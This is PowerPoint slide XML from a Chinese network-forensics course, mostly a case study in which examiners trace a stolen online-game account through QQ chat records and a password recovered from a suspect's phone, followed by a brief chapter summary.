            </a:pP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2010年8月，某司法机关委托笔者所在的某司法鉴定所鉴定一起盗窃网络游戏账号案。受害人王某向公安机关报案称自己花费3000元钱购买的一个“天龙八部”游戏账号被人盗取，因嫌疑人赵某盗取游戏账号后堂而皇之地在游戏中使用该账号，相关部门对嫌疑人的电脑进行了扣押，连同受害人的电脑硬盘一起送检，委托鉴定其中是否存在有盗窃该游戏账号的电子证据。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.7 QQ取证与分析案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="810260"/>
            <a:ext cx="7103110" cy="3738245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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根据案情</a:t>
            </a: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我们首先怀疑为木马植入与远程控制的方式进行电脑入侵，盗取游戏账号信息。按此思路，我们重点检查了受害人电脑系统中病毒木马及恶意代码情况和嫌疑人电脑系统中是否有远程控制程序代码情况，尽管我们进行了全盘数据恢复、关键字搜索、特定类型文件查找等技术手段，但是勘验结果出乎意料，没有发现任何相关痕迹。同时，我们依据用户行为司法鉴定的步骤方法，认真检查了嫌疑人电脑的应用程序缓存、文件搜索记录、经常执行的程序及快捷方式等系统运行痕迹；认真检查了历史访问记录、cookie文件、收藏夹记录、URL缓存记录等网络行为痕迹；认真检查了最近打开/保存的文档记录、应用程序最近选择的文件夹记录、资源管理器访问记录等文档处理痕迹；并根据这些用户行为痕迹，判读其电脑使用的习惯，论证其实施远程入侵控制的可能性。所有迹象表明，嫌疑人实施远程入侵控制受害人电脑系统盗取游戏账号的可能性微乎其微。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.7 QQ取证与分析案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="810260"/>
            <a:ext cx="7103110" cy="2122805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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通过</a:t>
            </a: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对嫌疑人电脑系统中即时聊天工具的勘验，我们发现其安装有QQ2010 SP3.1正式版聊天软件，进一步查看各QQ号码目录下的“Image”和“FileRecv”文件夹，我们发现并确认了嫌疑人的QQ号码证据信息，并找到大量聊天记录和“天龙八部”网络游戏的屏幕截图。分析这些零散的屏幕截图可以证明嫌疑人有使用过该失窃网游账号登陆游戏的行为，但没有找到其他能证明其盗窃行为的电子证据信息。此时，只有能获取到嫌疑人QQ的完整聊天记录，才可能发现更多更关键的电子证据信息。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.7 QQ取证与分析案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="810260"/>
            <a:ext cx="7103110" cy="1245235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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sz="12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因为聊天软件版本为QQ2010 SP3.1，加之嫌疑人使用QQ时没有在本地终端保存密码信息，使用工具软件和替换复合文档数据结构的方法都无法提取到聊天记录。在鉴定所与委托单位沟通后补充了检材：嫌疑人使用的一部高仿诺基亚N95山寨手机。结合手机取证鉴定工具进行勘验后我们发现，该山寨手机系统为MTK平台，芯片型号为MT6226BA，最重要的是手机内存中保存有手机QQ的登录密码，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="12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下</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="12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图所示。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482479" descr="手机QQ"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1876425" y="2016125"/>
            <a:ext cx="4987925" cy="2649220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1876425" y="4665345"/>
            <a:ext cx="5080000" cy="275590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="1050" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>MTK手机平台获取到的QQ号码及登陆口令截图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>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 TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="2054409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>物理层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(physical layer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：物理层传输数据的单位是比特。物理层不是指连接计算机的具体的物理设备或具体的传输媒体是什么，物理层的作用是尽可能的屏蔽这些差异，对它的高层即数据链路层提供统一的服务。物理层提供为建立、维护和拆除物理链路所需要的机械的、电气的、功能的和规程的特性。</a:t>
            </a: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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.7 QQ取证与分析案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="982980"/>
            <a:ext cx="7103110" cy="2122805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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sz="16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根据</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="12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手机QQ中提取到的登录密码，我们完整地提取到了嫌疑人硬盘中QQ的聊天记录，并从中发现了嫌疑人的朋友李某为该账号的注册人，该账号几经辗转出售到了受害人王某手里，其间账号登录密码多次变更，但注册认证的邮箱一直未变，李某就是通过该认证邮箱盗取了该游戏账号，并将其给嫌疑人使用以观察风险情况。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0" smtClean="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fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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该案件的司法鉴定不仅还原了犯罪真相，证明了嫌疑人赵某的知情人角色，找到了真正的盗窃犯罪实施者，还为QQ取证与手机取证相融合的全新鉴定方法提供了实践检验机会，取得了宝贵的实战经验。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.8 结束语</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="982980"/>
            <a:ext cx="7103110" cy="2676525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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sz="14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大量的电子数据司法鉴定案件实践经验表明，即时通信软件特别是QQ软件往往是电子数据司法鉴定的证据仓库，其聊天记录和相关文件夹中包含着大量的电子证据信息。一方面，QQ出于保护用户信息安全的社会责任，会不断地加强QQ反取证技术研究，完善防护措施；另一方面，随着国家司法鉴定制度的稳步推进，出于打击犯罪的需要，针对QQ取证及其司法鉴定的需求与维护用户隐私权益的责任之间的矛盾将日益显现。QQ取证及其司法鉴定方法研究的发展需要借鉴新思路，融合新技术，需要QQ相关企业能够积极参与到国家司法进程中来，主动研发QQ取证及其司法鉴定工具用于司法实践，才能解决好相关矛盾，促进QQ取证及其司法鉴定的方法研究。</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619293" y="1337721"/>
            <a:ext cx="2034540" cy="156845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smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="003466"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6.8</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="9600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="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614" y="2115293"/>
            <a:ext cx="1781944"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3654088" y="2114024"/>
            <a:ext cx="5644852" cy="7892"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="95250" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="003466"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7213600" y="2785745"/>
            <a:ext cx="1930400" cy="2325370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653790" y="1661160"/>
            <a:ext cx="4398010" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0"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小结</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4"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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>小结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="1229360"/>
            <a:ext cx="7047865" cy="1799590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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lang="en-US" altLang="zh-CN"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a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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网络取证主要通过对网络数据流、审计记录、主机系统日志等的实时监控和分析，发现对网络系统的入侵行为，自动记录犯罪证据，并阻止对网络系统的进一步入侵。除此以外，网络取证还要求对潜在的、有法律效力的证据的分析、确定与保护。本章讨论了网络取证的基本问题，确认和辨别网络取证的数据源、收集数据中要注意的问题、分析和检查网络通信数据等，最后讨论了QQ取证。</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3970"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EDEDEB"/>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3" name="直角三角形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3682219" y="0"/>
            <a:ext cx="5461781" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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斜纹 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5591908" y="0"/>
            <a:ext cx="2877178" cy="2700997"/>
          </a:xfrm>
          <a:prstGeom prst="diagStripe">
            <a:avLst>
              <a:gd name="adj" fmla="val 46235"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId3" cstate="print"/>
            <a:tile algn="t"/>
          </a:blip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 name="斜纹 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973774" y="0"/>
            <a:ext cx="990623" cy="929963"/>
          </a:xfrm>
          <a:prstGeom prst="diagStripe">
            <a:avLst>
              <a:gd name="adj" fmla="val 75545"/>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 name="任意多边形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013425" y="4437039"/>
            <a:ext cx="990623" cy="706462"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 997821 w 1320830"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 941949"/>
              <a:gd name="connsiteX1" fmla="*/ 1320830 w 1320830"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 941949"/>
              <a:gd name="connsiteX2" fmla="*/ 317439 w 1320830"/>
              <a:gd name="connsiteY2" fmla="*/ 941949 h 941949"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1320830"/>
              <a:gd name="connsiteY3" fmla="*/ 941949 h 941949"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1320830"/>
              <a:gd name="connsiteY4" fmla="*/ 936720 h 94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830" h="941949">
                <a:moveTo>
                  <a:pt x="997821" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1320830" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317439" y="941949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="941949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="936720"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A6A6A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3" name="任意多边形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268196" y="3844977"/>
            <a:ext cx="1810306" cy="1301936"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1823461 w 2413741"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1735915"/>
              <a:gd name="connsiteX1" fmla="*/ 2413741 w 2413741"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1735915"/>
              <a:gd name="connsiteX2" fmla="*/ 564595 w 2413741"/>
              <a:gd name="connsiteY2" fmla="*/ 1735915 h 1735915"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2413741"/>
              <a:gd name="connsiteY3" fmla="*/ 1735915 h 1735915"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2413741"/>
              <a:gd name="connsiteY4" fmla="*/ 1711802 h 17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741" h="1735915">
                <a:moveTo>
                  <a:pt x="1823461" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2413741" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564595" y="1735915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1735915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1711802"/>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4" name="任意多边形 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4756278"/>
            <a:ext cx="523886" cy="387222"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 543196 w 698514"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 516296"/>
              <a:gd name="connsiteX1" fmla="*/ 698514 w 698514"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 516296"/>
              <a:gd name="connsiteX2" fmla="*/ 148541 w 698514"/>
              <a:gd name="connsiteY2" fmla="*/ 516296 h 516296"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 698514"/>
              <a:gd name="connsiteY3" fmla="*/ 516296 h 516296"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 698514"/>
              <a:gd name="connsiteY4" fmla="*/ 509934 h 5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514" h="516296">
                <a:moveTo>
                  <a:pt x="543196" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="698514" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148541" y="516296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="516296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="509934"/>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5" name="斜纹 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2767496"/>
            <a:ext cx="2295525" cy="2154960"/>
          </a:xfrm>
          <a:prstGeom prst="diagStripe">
            <a:avLst>
              <a:gd name="adj" fmla="val 75545"/>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6" name="任意多边形 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3557572"/>
            <a:ext cx="834983" cy="783853"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 789260 w 1113310"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1045137"/>
              <a:gd name="connsiteX1" fmla="*/ 1113310 w 1113310"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1045137"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1113310"/>
              <a:gd name="connsiteY2" fmla="*/ 1045137 h 1045137"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1113310"/>
              <a:gd name="connsiteY3" fmla="*/ 740930 h 1045137"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1113310" h="1045137">
                <a:moveTo>
                  <a:pt x="789260" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1113310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1045137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="740930"/>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7" name="任意多边形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="-5565"/>
            <a:ext cx="1053821" cy="989291"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1025302 w 1405095"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1319055"/>
              <a:gd name="connsiteX1" fmla="*/ 1405095 w 1405095"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1319055"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1405095"/>
              <a:gd name="connsiteY2" fmla="*/ 1319055 h 1319055"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1405095"/>
              <a:gd name="connsiteY3" fmla="*/ 962518 h 1319055"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1405095" h="1319055">
                <a:moveTo>
                  <a:pt x="1025302" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1405095" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1319055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="962518"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF">
              <a:lumMod val="8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 name="Text Box 197"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6673215" y="4335145"/>
            <a:ext cx="2014855" cy="320675"/>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FF0517"/>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500" tIns="36750" rIns="73500" bIns="36750">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defTabSz="822960">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1620" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>德才兼备 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1620" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1620" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文武双全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2281853" y="1226437"/>
            <a:ext cx="2073910" cy="589280"/>
          </a:xfrm>
